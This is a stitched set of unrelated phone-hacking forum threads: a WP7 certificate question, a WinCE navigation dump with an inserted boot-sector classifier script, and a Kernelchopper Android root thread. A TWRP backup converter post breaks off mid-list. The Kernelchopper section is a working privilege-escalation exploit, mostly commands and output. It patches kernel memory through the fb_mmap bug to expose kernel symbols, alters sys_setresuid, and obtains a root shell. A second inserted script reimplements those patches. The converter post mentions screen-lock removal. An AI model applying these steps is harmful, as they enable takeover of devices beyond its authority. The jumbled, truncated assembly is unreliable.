WP7 hacking ... - Windows Phone 7 Q&A, Help & Troubleshooting

Hello,
I looked on my WP7 and saw a cert...
Looking at a root cert, the name is:
with the following entries:
Key ID=8b 4b 6d ed d3 29 b9 06 19 ec 39 39 a9 f0 97 84 6a cb ef df
Certificate issuer:
Directory address:
CN=QuoVadis Root Certification Authority
OU=Root Certification Authority
O=QuoVadis Limited
C=BM
Certificate serial number=3a b6 50 8b
Who can tell me now what this cert is for!?
Is it not a hash for root?!
THX
P.S.
I will learn what my machine does.
//Edit:
Fingerprint algorithm is:
sha1
Subject type=Certification authority
Path length constraint=None
Type of applicant=CA
Certificate Signing, Off-line CRL Signing, CRL Signing (06)
Sorry, I can't translate it XD
I have looked on the Internet and found this:
http://www.quovadisglobal.ch/Repository/DownloadRootsAndCRL.aspx#QuoVadis Root CA
Here you can download the cert and root cert:
http://www.quovadisglobal.ch/Repository/~/media/Files/Roots/quovadis_rca_der.ashx
This is the cert that is on my phone; who can tell me now what it is?
I have found another cert, it is with an RSA key and 1024 bit.
Here is a report that a security hole was found in RSA:
http://www.eecs.umich.edu/~valeria/research/publications/DATE10RSA.pdf
But I see that in the cert there are 2048 bit XD
Is this for root access!?
"Microsoft Secure Server Authority"


[Q] How to convert NDumpCE6 img to bin

Hi all,
I got a new in-car navigation system. It has WinCE 6 installed (Blaupunkt New York 800, which is mostly a rebranded ADVENT ADVUV630).
Now, for troubleshooting and stuff, I made a dump of that device using NDumpCE6. I want to use this dump to load it into the Windows CE Emulator from Microsoft.
Is there any chance to get it to work?
I got 4 dumps overall:
Complete disk (CF card):
DSK1.img - 249 MB (261.095.424 bytes)
First 16 hex values: e9 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Then I also dumped all partitions separately:
Part00.img - 41,2 MB (43.251.712 bytes)
First 16 hex values: fe 03 00 ea 29 2a 28 00 2a 2a 29 00 2a 2a 2a 00
Part01.img - 30,7 MB (32.243.712 bytes)
First 16 hex values: eb 76 90 45 58 46 41 54 20 20 20 00 00 00 00 00
Which equals: .vEXFAT (<<< So that's interesting...)
Part02.img - 174 MB (182.976.512 bytes)
First 16 hex values: eb fe 90 4d 53 57 49 4e 34 2e 31 00 08 01 20 00
Which equals: ...MSWIN4.1....
And a little further: 20 20 46 41 54 33 32 20 20 20 00 00 00 00 00 00
: FAT32 (<<< So that's also interesting...) NOT anymore - it's a Microsoft Windows Boot Record (http://thestarman.pcministry.com/asm/mbr/MSWin41BRinHexEd.htm )
So PART02 seems to hold the boot partition....
Update: Funny thing - I just tried to mount part02.img in DAEMON Tools - and guess what: it works!
I found one directory called: CE69
In that folder I found some files and other folders...
arial-uni2.1.ttf
Bluetooth.dll
CE69.EXE
DriveInterfaceCTL.dll
HYDIB.DLL
INIFILE.DLL
INSTALL.INI
Memory.dll
MFCCE400.DLL
MPU.BIN
OSCtrl.exe
Protocol.dll
RunAppPath.txt
SAMPLE.DUI
SYSTEM.INI
UIContainer.dll
UIDesignerDLL.dll
UIFC.DLL
Upgrade.exe
XMRadio.dll
uifilters <FOLDER>
Resource <FOLDER>
Things I tried already:
Use dumprom.exe to extract anything. Well, I got something out of the first partition - but that's only some WinCE files:
binfs.dll
BINFSCheck.dll
boot.hv
busenum.dll
ceddk.dll
coredll.dll
default.hv
device.dll
devmgr.dll
filesys.dll
flashdrv.dll
fsdmgr.dll
hd.dll
i2c.dll
initdb.ini
initobj.dat
k.ceddk.dll
k.coredll.dll
k.fpcrt.dll
kernel.dll
mspart.dll
nk.exe
oalioctl.dll
osaxst0.dll
pm.dll
regenum.dll
romfsd.dll
sdbus.dll
sdhc.dll
sdmemory.dll
servicesd.exe
user.hv
utldrv.dll
wince.nls
Okay - I'm now trying to find out something about that exFAT dump and whether I could load it somehow...
Of course, any help is very welcome ;-)
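The signature checks behind the guesses in the post above, as an added example that is not part of the original post: the first 16 bytes of each dump are the values quoted in the post, padded here to full 512-byte sectors (the "FAT32   " label at offset 0x52 that the post also quotes, and a 55AA boot signature that the post does not show, are added to the Part02 sample as assumptions). Each sector is then classified by the standard exFAT/FAT32 boot-sector fields, and, failing that, by decoding its first word as an ARM instruction.

```python
"""Classify raw partition dumps from their first sector.

Added example, not from the original post. The 16-byte prefixes below are the
values quoted in the post; everything after them in each sample is constructed
(zero padding, plus for Part02 the "FAT32   " label at 0x52 that the post also
quotes and an assumed 55AA boot signature at offset 510).
"""
import struct
import sys


def make_sector(prefix_hex: str, patches: dict = None) -> bytes:
    """Build a 512-byte sector: quoted prefix, zero fill, optional patches."""
    sec = bytearray(512)
    prefix = bytes.fromhex(prefix_hex)
    sec[:len(prefix)] = prefix
    for off, data in (patches or {}).items():
        sec[off:off + len(data)] = data
    return bytes(sec)


SAMPLES = {
    "DSK1.img":   make_sector("e9 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff"),
    "Part00.img": make_sector("fe 03 00 ea 29 2a 28 00 2a 2a 29 00 2a 2a 2a 00"),
    "Part01.img": make_sector("eb 76 90 45 58 46 41 54 20 20 20 00 00 00 00 00"),
    "Part02.img": make_sector("eb fe 90 4d 53 57 49 4e 34 2e 31 00 08 01 20 00",
                              {0x52: b"FAT32   ", 0x1FE: b"\x55\xAA"}),
}


def classify_sector(sec: bytes) -> str:
    """Return a label for a 512-byte sector from well-known signatures."""
    if len(sec) < 512:
        raise ValueError("need a full 512-byte sector")
    oem = sec[3:11]                                   # OEM name in FAT/exFAT boot sectors
    boot_sig = struct.unpack_from("<H", sec, 510)[0]  # 0xAA55 ends a valid boot sector
    if sec[0] == 0xEB and oem == b"EXFAT   ":
        return "exFAT boot sector"
    if sec[0] == 0xEB and oem == b"MSWIN4.1":
        # BS_FilSysType is only a hint (the real test is the cluster count), but it
        # is what a hex editor shows, and it is what the post saw at 0x52.
        fs = "FAT32" if sec[0x52:0x5A] == b"FAT32   " else "FAT12/16"
        note = "" if boot_sig == 0xAA55 else ", missing 55AA signature"
        return f"{fs} boot sector (MSWIN4.1{note})"
    word0 = struct.unpack_from("<I", sec, 0)[0]
    # ARM: cond == 0xE (always) and bits 27..25 == 0b101 is an unconditional branch,
    # the usual first instruction of a raw ARM bootloader / OS image.
    if (word0 >> 28) == 0xE and ((word0 >> 25) & 0x7) == 0b101:
        imm24 = word0 & 0x00FFFFFF
        if imm24 & 0x800000:                          # sign-extend the 24-bit offset
            imm24 -= 0x1000000
        target = 8 + imm24 * 4                        # target relative to image start (PC+8)
        return f"raw ARM image (first instruction branches to +0x{target:X})"
    if sec[0] == 0xE9 and sec[2:16] == b"\xff" * 14:
        return "no filesystem signature (x86 JMP then 0xFF fill)"
    return "unknown"


def classify_all(samples: dict = None) -> dict:
    """Classify every sample; used by the self-test and the demo below."""
    return {name: classify_sector(sec) for name, sec in (samples or SAMPLES).items()}


if __name__ == "__main__":
    # With a path argument, classify the first sector of a real dump; otherwise the samples.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], "->", classify_sector(fh.read(512)))
    else:
        for name, label in classify_all().items():
            print(f"{name:11} -> {label}")
```

Run it with a dump path (`python3 classify_sector.py Part00.img`) to check a real file. On the quoted bytes, Part01 is an exFAT volume, Part02 a FAT32 volume, and Part00 starts with an unconditional ARM branch to +0x1000, which is consistent with dumprom pulling WinCE system files out of that partition; DSK1's first sector (an x86 JMP opcode followed by 0xFF fill) carries no FAT or exFAT signature, so a tool expecting a normal boot sector or MBR there will not recognise it.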
Hello,
I may be able to help you as I have the ADVUV630, but I am curious how you get NDumpCE6 to run in the first place on your unit? I see everyone saying "run it" but never how, lol... like, do you name it something special and put it on an SD card or something?
--thesh0ck
Wow, a 2012 post. Well, to revive it if possible: any luck? Messing with my WinCE head unit in my truck.

[ROOT]Kernelchopper: open source method to root locked Android version <= 4.1

Here is an open-source method, based on djrbliss' fb_mmap exploit, to possibly root your phone (with adb enabled).
Theoretically, everything in the compatibility list of motochopper should be compatible with my open-source method.
Theoretically, it may even work for other phones, including old phones and old tablets, provided the fb_mmap exploit is not patched. But so far it was only tested on Android v4.1.
You may want to use recovery mode to boot the oldest official ROM you can find for your device (with or without flashing it); it should be older than mid 2013, when that bug was found.
It does not need to be an Exynos-based device: I only use the name exynos because I reused the privilege escalation that was in the exynos exploit.
In step 1, kernelchopper uses the fb_mmap exploit to gain read-write access to the kernel residing in memory. Then a privilege escalation in steps 2 and 3 gives a root shell, without modifying the SD card or any files, and without rebooting.
It is based on:
- 300 lines of C code I attached to this post (an older version is attached there)
- an ARM compiler to compile this code, if you do not want to trust my resulting binaries attached to http://forum.xda-developers.com/showpost.php?p=44872887&postcount=14
- any apk with a terminal you trust (I use Terminal IDE; Terminal Emulator will do).
- any busybox you trust (I use the one from Terminal IDE).
- a computer with the Android development package; I used adt-bundle-linux-x86-20130729
STEP 0: You may apply this to any Android system at your own risk. If your output of any instruction is not exactly as shown here, you should adapt the following instructions accordingly (following the color codes, and counting the underlined words in hexadecimal notation), or better quit. If you do not get exactly all the outputs I colored here in red, you should QUIT or change the previous instructions.
If you have no internal microSD, I suggest you first chdir to a directory on your computer which can host one file of size >4 GB (3898777809 bytes for my Padfone 2, the day I bought it).
STEP 1: finding the s_show->seq_printf format string (in the example given, found at 0x80c281c6).
Open Terminal IDE, select "install system". You do not need to "install gcc". Then select the first menu item named "terminal IDE", and type at its prompt:
Code:
chmod 1777 /data/data/com.spartacusrex.spartacuside/files ; cp system/bin/busybox grep ; chmod 755 grep
We now use adb to put all attached files (unzipped) in /data/data/com.spartacusrex.spartacuside/files. The /usr/bin/script command is specific to Linux; if you do not have it, it will be more difficult to make bug reports, and you will need a microSD card or a USB disk plugged into your Android.
Code:
script backup_before_installing_su_to_disk
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/kernelchopper /data/data/com.spartacusrex.spartacuside/files
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/exynos-abuse-static /data/data/com.spartacusrex.spartacuside/files
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb shell
cd /data/data/com.spartacusrex.spartacuside/files
./grep -l . /dev/graphics/fb0
[COLOR="Red"]/dev/graphics/fb0[/COLOR]
./grep Kernel /proc/iomem
[COLOR="RoyalBlue"]80208000[/COLOR]-80d9e39f : Kernel code
80f04000-8128184b : Kernel data
./kernelchopper d [COLOR="RoyalBlue"]80208000[/COLOR] 2
[COLOR="RoyalBlue"]80208000[/COLOR] 00 00
./kernelchopper d [COLOR="RoyalBlue"]80208000[/COLOR] c00000 | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 70 4b 20 25 63 20 25 73 0a 00\|: 4b 20 25 63 20 25 73 0a 00\|: 20 25 63 20 25 73 0a 00\|: 25 63 20 25 73 0a 00\|: 63 20 25 73 0a 00\|25 70 4b 20 25 63 20 25 73 0a $\|25 70 4b 20 25 63 20 25 73 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 $\|25 70 4b 20 25 63 $' | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 20 25 73 0a 00\|: 25 73 0a 00\|: 73 0a 00\|: 0a 00\|: 00\|25 70 4b 20 25 $\|25 70 4b 20 $\|25 70 4b $\|25 70 4b $\|25 70 $\|25 $'
[COLOR="Green"]80c281c[/COLOR]0: 5b 25 73 5d 0a 00 25 70 4b 20 25 63 20 25 73 0a
80c281d0: 00 6b 61 6c 6c 73 79 6d 73 00 2b 25 23 6c 78 2f
./kernelchopper d [COLOR="Green"]80c281c[/COLOR]0 20
80c281c0: [U]5b 25 73 5d 0a 00[/U] 25 70 4b 20 25 63 20 25 73 0a
80c281d0: 00 6b 61 6c 6c 73 79 6d 73 00 2b 25 23 6c 78 2f
./kernelchopper d [COLOR="Green"]80c281c[/COLOR][U]6[/U] b
[COLOR="Olive"]80c281c6[/COLOR]: [COLOR="Red"]25 70 4b 20 25 63 20 25 73 0a 00[/COLOR]
./kernelchopper m [COLOR="Olive"]80c281c6[/COLOR]
[COLOR="Red"]204b7025[/COLOR]
./grep sys_setresuid /proc/kallsyms
00000000 T sys_setresuid
00000000 T sys_setresuid16
./kernelchopper m [COLOR="Olive"]80c281c6[/COLOR] 20207025
./kernelchopper m [COLOR="Olive"]80c281c6[/COLOR]
[COLOR="Red"]20207025[/COLOR]
./grep sys_setresuid /proc/kallsyms
c[COLOR="SandyBrown"]00856f0[/COLOR] T sys_setresuid
c00b7318 T sys_setresuid16
Notice that /proc/kallsyms now gives offsets instead of 00000000.
STEP 2: patching sys_setresuid, applying exynos-abuse.c manually (found at 0x802856f0, which is 0x00856f0 plus 80208000). You should replace the underlined lone 8 by the number of bytes underlined before the 00 00 50 e3 ...
Code:
./kernelchopper d [COLOR="YellowGreen"]802856f0[/COLOR] 80 | ./grep '00 00 50 e3\|20 00 00 ea'
[COLOR="Purple"]8028572[/COLOR]0: [U]04 72 93 e5 a7 da ff eb[/U] 00 00 50 e3 20 00 00 ea
./kernelchopper d [COLOR="Purple"]8028572[/COLOR][U]8[/U] 8
[COLOR="MediumTurquoise"]80285728[/COLOR]: [COLOR="Red"]00 00 50 e3 20 00 00 ea[/COLOR]
./kernelchopper m [COLOR="MediumTurquoise"]80285728[/COLOR]
[COLOR="Red"]e3500000[/COLOR]
./kernelchopper m [COLOR="MediumTurquoise"]80285728[/COLOR] e3500001
STEP 3: getting a root shell.
Code:
./exynos-abuse-static
root@android:/data/data/com.spartacusrex.spartacuside/files # /system/bin/id
uid=[COLOR="Red"]0[/COLOR](root) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
Step 4: now you are root until the end of the adb connection. I strongly suggest that you make the first true backup, to have a chance to restore the phone to its current state. With an internal microSD, you can type:
Code:
cp grep bzip2
./bzip2 -c < /dev/block/mmcblk0 > /Removable/Storage1/backup.bz2
To use this file, you will need kpartx.
If you have NO internal microSD, try a network WiFi drive; or if you can wait a full day (like me), you can do:
Code:
cp grep bzip2
cp grep uuencode
./bzip2 -c < /dev/block/mmcblk0 | ./uuencode -
The result will be shown in the current window, so you had better hide it once it works. I got a throughput of 400 kB/s with a hidden xterm.
You will then be able to recover its content with
Code:
LANG= grep -aA99999999 '^begin 666 -' < backup_before_installing_su_to_diskreal | uudecode -o backup.bz2
You may now install /system/xbin/su, possibly renamed to avoid exposing su to malware. I personally installed, suid root, a wrapper to the sshd service of gentooandroid.sourceforge.net.
Here is my firmware.
Code:
Android version: 4.1.1, 3.4.0-perf-g64..., M3.13.30-A68_101034 [Jan 22 2013]
If you need help, please press up-arrow repeatedly, then down-arrow repeatedly, then provide the file backup_before_installing_su_to_diskreal.
Credits to alephzain for the original version of exynos-abuse.c, SW686 for kernelchopper.c, spartacusrex for Google Play's Terminal IDE.
This was tested independently here, and the first version of this post was made in the same thread.
Please suggest tags; this is the first thread I open.
./kernelchopper d 80208000 c00000 | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 70 4b 20 25 63 20 25 73 0a 00\|: 4b 20 25 63 20 25 73 0a 00\|: 20 25 63 20 25 73 0a 00\|: 25 63 20 25 73 0a 00\|: 63 20 25 73 0a 00\|25 70 4b 20 25 63 20 25 73 0a $\|25 70 4b 20 25 63 20 25 73 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 $\|25 70 4b 20 25 63 $' | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 20 25 73 0a 00\|: 25 73 0a 00\|: 73 0a 00\|: 0a 00\|: 00\|25 70 4b 20 25 $\|25 70 4b 20 $\|25 70 4b $\|25 70 4b $\|25 70 $\|25 $'
Returns nothing, how to crack?
PJ.C said:
Returns nothing, how to crack?
Try
Code:
./kernelchopper d 80208000 2
Try
Code:
./kernelchopper d 80208000 2
Code:
135|shell@android:/data/local/tmp $ ./grep Kernel /proc/iomem
./grep Kernel /proc/iomem
4032e000-40abffff : Kernel text
40ac0000-4101f7d7 : Kernel data
shell@android:/data/local/tmp $
shell@android:/data/local/tmp $ ./grep Kernel /proc/iomem
./grep Kernel /proc/iomem
4032e000-40abffff : Kernel text
40ac0000-4101f7d7 : Kernel data
shell@android:/data/local/tmp $ ./kernelchopper d 4032e000 2
./kernelchopper d 4032e000 2
address out of range (mapping covers 50000000..ffffffff)
1|shell@android:/data/local/tmp $
My phone model is GT-I9220.
Oh, my fault, there is no "Kernel code"...
Code:
1|shell@android:/data/local/tmp $ cat /proc/iomem
cat /proc/iomem
03830000-038300ff : samsung-i2s.0
03830000-038300ff : samsung-i2s
10060000-10060fff : s3c2410-wdt
10070000-100700ff : exynos-rtc
10070000-100700ff : exynos-rtc
100b0000-100b0fff : s5p-tvout-cec
100c0000-100cfffe : s5p-tmu
100c0000-100cfffe : s5p-tmu
11800000-11800fff : s3c-fimc.0
11800000-11800fff : s3c-fimc
11810000-11810fff : s3c-fimc.1
11810000-11810fff : s3c-fimc
11820000-11820fff : s3c-fimc.2
11820000-11820fff : s3c-fimc
11830000-11830fff : s3c-fimc.3
11830000-11830fff : s3c-fimc
11840000-1184ffff : s5p-jpeg
11840000-1184ffff : s5p-jpeg
11880000-11883fff : s3c-csis.0
11880000-11883fff : s3c-csis
11890000-11893fff : s3c-csis.1
11890000-11893fff : s3c-csis
11a20000-11a20fff : s5p-sysmmu.1
11a20000-11a20fff : s5p-sysmmu.1
11a30000-11a30fff : s5p-sysmmu.2
11a30000-11a30fff : s5p-sysmmu.2
11a40000-11a40fff : s5p-sysmmu.3
11a40000-11a40fff : s5p-sysmmu.3
11a50000-11a50fff : s5p-sysmmu.4
11a50000-11a50fff : s5p-sysmmu.4
11c00000-11c07fff : s3cfb.0
11c00000-11c07fff : s3cfb
11c40000-11c47fff : ielcd
11c80000-11c8ffff : s5p-dsim.0
11c80000-11c8ffff : s5p-dsim
11ca0000-11ca0fff : mdnie
12480000-12480fff : s3c_otghcd
12480000-12480fff : s3c-usbgadget
12480000-12480fff : s3c-usbgadget
12530000-12530fff : s3c-sdhci.2
12530000-12530fff : mmc1
12540000-12540fff : s3c-sdhci.3
12540000-12540fff : mmc2
12550000-12550fff : dw_mmc
12550000-12550fff : mmc0
12580000-125800ff : s5p-ehci
12680000-12681000 : s3c-pl330.1
12680000-12681000 : s3c-pl330
12690000-12691000 : s3c-pl330.2
12690000-12691000 : s3c-pl330
12800000-12800fff : s5p-fimg2d
12800000-12800fff : s5p-fimg2d
12850000-12851000 : s3c-pl330.0
12850000-12851000 : s3c-pl330
12a20000-12a20fff : s5p-sysmmu.9
12a20000-12a20fff : s5p-sysmmu.9
12c00000-12c0ffff : s5p-vp
12c00000-12c0ffff : s5p-vp
12c10000-12c1ffff : s5p-mixer
12c10000-12c1ffff : s5p-mixer
12c20000-12c2ffff : s5p-sdo
12d00000-12dfffff : s5p-hdmi
12d00000-12dfffff : s5p-hdmi
12e20000-12e20fff : s5p-sysmmu.12
12e20000-12e20fff : s5p-sysmmu.12
13000000-13000097 : Mali-400 GP
13001000-1300102f : Mali-400 L2 cache
13003000-13003023 : Mali-400 MMU for GP
13004000-13004023 : Mali-400 MMU for PP 0
13005000-13005023 : Mali-400 MMU for PP 1
13006000-13006023 : Mali-400 MMU for PP 2
13007000-13007023 : Mali-400 MMU for PP 3
13008000-130090ef : Mali-400 PP 0
1300a000-1300b0ef : Mali-400 PP 1
1300c000-1300d0ef : Mali-400 PP 2
1300e000-1300f0ef : Mali-400 PP 3
13400000-1340ffff : s3c-mfc
13400000-1340ffff : s3c-mfc
13620000-13620fff : s5p-sysmmu.13
13620000-13620fff : s5p-sysmmu.13
13630000-13630fff : s5p-sysmmu.14
13630000-13630fff : s5p-sysmmu.14
13800000-138000ff : s5pv210-uart.0
13800000-138000ff : s5pv210-uart
13810000-138100ff : s5pv210-uart.1
13810000-138100ff : s5pv210-uart
13820000-138200ff : s5pv210-uart.2
13820000-138200ff : s5pv210-uart
13830000-138300ff : s5pv210-uart.3
13830000-138300ff : s5pv210-uart
13860000-13860fff : s3c2440-i2c.0
13860000-13860fff : s3c2440-i2c
13870000-13870fff : s3c2440-i2c.1
13870000-13870fff : s3c2440-i2c
13890000-13890fff : s3c2440-i2c.3
13890000-13890fff : s3c2440-i2c
138b0000-138b0fff : s3c2440-i2c.5
138b0000-138b0fff : s3c2440-i2c
138c0000-138c0fff : s3c2440-i2c.6
138c0000-138c0fff : s3c2440-i2c
138d0000-138d0fff : s3c2440-i2c.7
138d0000-138d0fff : s3c2440-i2c
138e0000-138e03ff : s5p-i2c-hdmi-phy
138e0000-138e03ff : s5p-i2c-hdmi-phy
13910000-13911fff : samsung-adc-v3
40000000-7fffffff : System RAM
4032e000-40abffff : Kernel text
40ac0000-4101f7d7 : Kernel data
shell@android:/data/local/tmp $
PJ.C said:
My phone model is GT-I9220.
Oh, my fault, there is no "Kernel code"...
Code:
: samsung-adc-v3
40000000-7fffffff : System RAM
4032e000-40abffff : Kernel text
40ac0000-4101f7d7 : Kernel data
shell@android:/data/local/tmp $
What is your Android version number?
Try the attached binary.
xdej said:
What is your Android version number?
Try the attached binary.
Code:
shell@android:/data/local/tmp $ ./kernelchopper_10000000 d 4032e000 2
unexpected mmap() error: Operation not permitted
1|shell@android:/data/local/tmp $
The problem is I can't get the address of the kernel code...
Android version 4.1.2, build id JZO54K.I9220ZCLSF
PJ.C said:
Code:
shell@android:/data/local/tmp $ ./kernelchopper_10000000 d 4032e000 2
unexpected mmap() error: Operation not permitted
1|shell@android:/data/local/tmp $
The problem is I can't get the address of the kernel code...
According to http://forum.xda-developers.com/showpost.php?p=40873964&postcount=2 you have found it. text=code apparently.
Android version 4.1.2, build id JZO54K.I9220ZCLSF
mmap worked with map_start = 50000000 on your phone, but not with map_start = 10000000, so let's try map_start = 40000000 (use the attached binary or source code).
xdej said:
mmap worked with map_start = 50000000 on your phone, but not with map_start = 10000000, so let's try map_start = 40000000 (use the attached binary or source code).
I get the same result:
Code:
shell@android:/data/local/tmp $ ./kernelchopper_40000000 d 4032e000 2
unexpected mmap() error: Operation not permitted
1|shell@android:/data/local/tmp $
How can I compile this source code for the phone?
PJ.C said:
I get the same result:
Code:
shell@android:/data/local/tmp $ ./kernelchopper_40000000 d 4032e000 2
unexpected mmap() error: Operation not permitted
1|shell@android:/data/local/tmp $
The fb_mmap exploit seems to be patched on your phone.
Try booting your phone with the oldest official ROM you can find (with or without flashing it).
PJ.C said:
how can [you] compile this source code for the phone?
I use gentooandroid.sourceforge.net.
If you can reach a Raspberry Pi, you can use its compiler.
If you know how to do it, you may also cross-compile for armv7j platforms.
Thanks a lot! I will try it.
Hi xdej
Thanks for your work!
I am trying to root a Galaxy Express 2 (SM-G3815).
shell is in the graphics group but kernelchopper (or kernelchopper_10000000) does not return to the prompt (so I have to ^C)
~ # adb shell
[email protected]:/ $ touch /dev/graphics/fb0
[email protected]:/ $ ls -al /dev/graphics/fb0
crw-rw---- system graphics 29, 0 2014-01-01 23:49 fb0
[email protected]:/data/local/tmp $ id
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
[email protected]:/ $ grep Kernel /proc/iomem
80208000-80d55867 : Kernel code
80f04000-811a0493 : Kernel data
[email protected]:/ $ cd /data/local/tmp
[email protected]:/data/local/tmp $ chmod 755 kernelchopper*
[email protected]:/data/local/tmp $ ./kernelchopper d 80208000 2
^C
[email protected]:/data/local/tmp $ ./kernelchopper_10000000 d 80208000 2
^C
Have a nice day and happy 2014
Nofan Tasi said:
shell is in the graphics group but kernelchopper (or kernelchopper_10000000) does not return to the prompt (so I have to ^C)
Let it run for hours, to give it better chances.
Hi xdej
Thanks so much for giving timing advice
By the way, clearly the first step in your hack seems to expose kallsyms.
Can you explain a bit what this does and how it works?
Have a nice day!
Hi xdej
I ran kernelchopper for an hour or 4 and the device almost melts. No output.
Maybe one (perhaps myself) can make it a bit more verbose, to mention what it is trying to do.
Have a nice day
Nofan Tasi said:
By the way, clearly the first step in your hack seems to expose kallsyms.
Can you explain a bit what this does and how it works?
I just translated the hack listed below, published in lines 68--89 of the file exynos-abuse.c attached to message http://forum.xda-developers.com/showthread.php?p=35469999 ; I translated it from C into the syntax of kernelchopper. The comments are the explanation you asked for.
Code:
/*
 * search the format string "%pK %c %s\n" in memory
 * and replace "%pK" by "%p" to force display kernel
 * symbols pointer
 */
for(m = 0; m < length; m += 4) {
    if(*(unsigned long *)tmp == 0x204b7025 && *(unsigned long *)(tmp+1) == 0x25206325 && *(unsigned long *)(tmp+2) == 0x00000a73 ) {
        printf("[*] s_show->seq_printf format string found at: 0x%08X\n", PAGE_OFFSET + m);
        restore_ptr_fmt = tmp;
        *(unsigned long*)tmp = 0x20207025;
        found = true;
        break;
    }
    tmp++;
}
if (found == false) {
    printf("[!] s_show->seq_printf format string not found\n");
    exit(1);
}
found = false;
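The two in-memory patches of STEP 1 and STEP 2 in the first post, and the exynos-abuse.c loop quoted just above, applied to a constructed kernel image, as an added example that is not the thread's own code. KERNEL_BASE, the byte layout of the fake image and the position of the sys_setresuid stub are assumptions for the demonstration; on a device the bytes come from `kernelchopper d <base> <len>` and the base from `grep Kernel /proc/iomem`. Searching the raw bytes also replaces the long grep pipeline of STEP 1, which only exists because the pattern may straddle a hexdump line break.

```python
"""Kernelchopper steps 1 and 2 on a constructed kernel image.

Added example, not code from the thread. KERNEL_BASE, the layout of the fake
image and the stub position are assumptions for the demonstration; on a device
the bytes come from `kernelchopper d <base> <len>` and the base from
`grep Kernel /proc/iomem`.
"""
import struct

KERNEL_BASE = 0x80208000                 # assumed; the OP's "Kernel code" start

# s_show() in fs/proc/kallsyms.c prints each symbol with "%pK %c %s\n".  With
# kptr_restrict set, %pK prints 00000000 to unprivileged readers; "%p " (same
# width, so nothing else moves) prints the real address.
KALLSYMS_FMT = b"%pK %c %s\n\x00"
KALLSYMS_FMT_PATCHED = b"%p  %c %s\n\x00"

CMP_R0_0 = 0xE3500000                    # ARM: cmp r0, #0
CMP_R0_1 = 0xE3500001                    # ARM: cmp r0, #1
BL_MASK, BL_BITS = 0x0F000000, 0x0B000000  # bits 27..24 == 0b1011 -> bl


def build_fake_kernel() -> bytearray:
    """Constructed image: filler, the format string as in the OP's dump, filler,
    then the 16 bytes the OP showed from inside sys_setresuid."""
    mem = bytearray(0x100)
    mem += b"[%s]\n\x00" + KALLSYMS_FMT + b"kallsyms\x00+%#lx/"
    mem += bytes(0x1000 - len(mem))
    # ldr r7,[r3,#4] ; bl <nearby> ; cmp r0,#0 ; b <+0x88>
    mem += bytes.fromhex("04 72 93 e5 a7 da ff eb 00 00 50 e3 20 00 00 ea")
    mem += bytes(0x100)
    return mem


def find_kallsyms_fmt(mem: bytes) -> int:
    """Offset of the s_show format string, or -1 (what STEP 1's grep pipeline finds)."""
    return mem.find(KALLSYMS_FMT)


def patch_kallsyms_fmt(mem: bytearray) -> tuple:
    """STEP 1: overwrite "%pK" with "%p " so /proc/kallsyms shows addresses.
    Returns (address, old_word, new_word), the values `kernelchopper m` prints."""
    off = find_kallsyms_fmt(mem)
    if off < 0:
        raise LookupError("s_show->seq_printf format string not found")
    old = struct.unpack_from("<I", mem, off)[0]      # 0x204b7025 == b"%pK " little-endian
    mem[off:off + len(KALLSYMS_FMT_PATCHED)] = KALLSYMS_FMT_PATCHED
    new = struct.unpack_from("<I", mem, off)[0]      # 0x20207025 == b"%p  "
    return KERNEL_BASE + off, old, new


def patch_setresuid(mem: bytearray, func_off: int, window: int = 0x80) -> tuple:
    """STEP 2: inside the first `window` bytes of sys_setresuid find the first
    'cmp r0, #0' that directly follows a 'bl' (the test on that call's return
    value) and make it 'cmp r0, #1', so a zero return now compares unequal and
    the conditional that consumes the flags goes the other way.
    Returns (address, old_word, new_word)."""
    for off in range(func_off + 4, func_off + window, 4):
        word = struct.unpack_from("<I", mem, off)[0]
        prev = struct.unpack_from("<I", mem, off - 4)[0]
        if word == CMP_R0_0 and (prev >> 28) == 0xE and (prev & BL_MASK) == BL_BITS:
            struct.pack_into("<I", mem, off, CMP_R0_1)
            return KERNEL_BASE + off, word, CMP_R0_1
    raise LookupError("cmp r0, #0 after bl not found in sys_setresuid window")


if __name__ == "__main__":
    mem = build_fake_kernel()
    for addr, old, new in (patch_kallsyms_fmt(mem), patch_setresuid(mem, 0x1000)):
        print(f"{addr:08x}: {old:08x} -> {new:08x}")
```

On the fake image the first patch reports the same word pair the OP saw (204b7025 becomes 20207025) and the second reports e3500000 becoming e3500001 at the word after the `bl`. The `bl` check is the part worth keeping: the OP's instructions say to count the bytes before `00 00 50 e3`, and a bare search for e3500000 inside a 0x80-byte window could hit a different compare.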
Hi !
Nofan Tasi said:
Maybe one (perhaps myself) can make it a bit more verbose, to mention what it is trying to do.
If you share the patched version of kernelchopper but are unable to compile it, I will compile it for you.
Hi xdej,
Thanks for all help.

[RECOVERY] [TWRP] Backup Converter Android system recovery <3e>

- for Linux only -
Stock Recovery to TWRP Backup Converter for Android system recovery <3e>
This program is basically written for unpacking the stock recovery Android backup userdata_20160823_100259.backup and converting it into a custom recovery nandroid backup data.ext4.win000 (but you can create your own TWRP backups from "any" data source, too).
The content and usage of bckp2win.sh is similar to bckp2cwm.sh with some slight modifications. Based on the previous version, it skips the checksum and unpacks the /data partition from userdata_00000000_000000.backup, then re-packs it as a TWRP backup. Optionally the screen lock pattern can be unlocked.
Requirements:
- PC with Linux
- ext4 formatted hard disk
may work on NTFS, give it a try (in case the backup is a partition image)
Requirements (source phone):
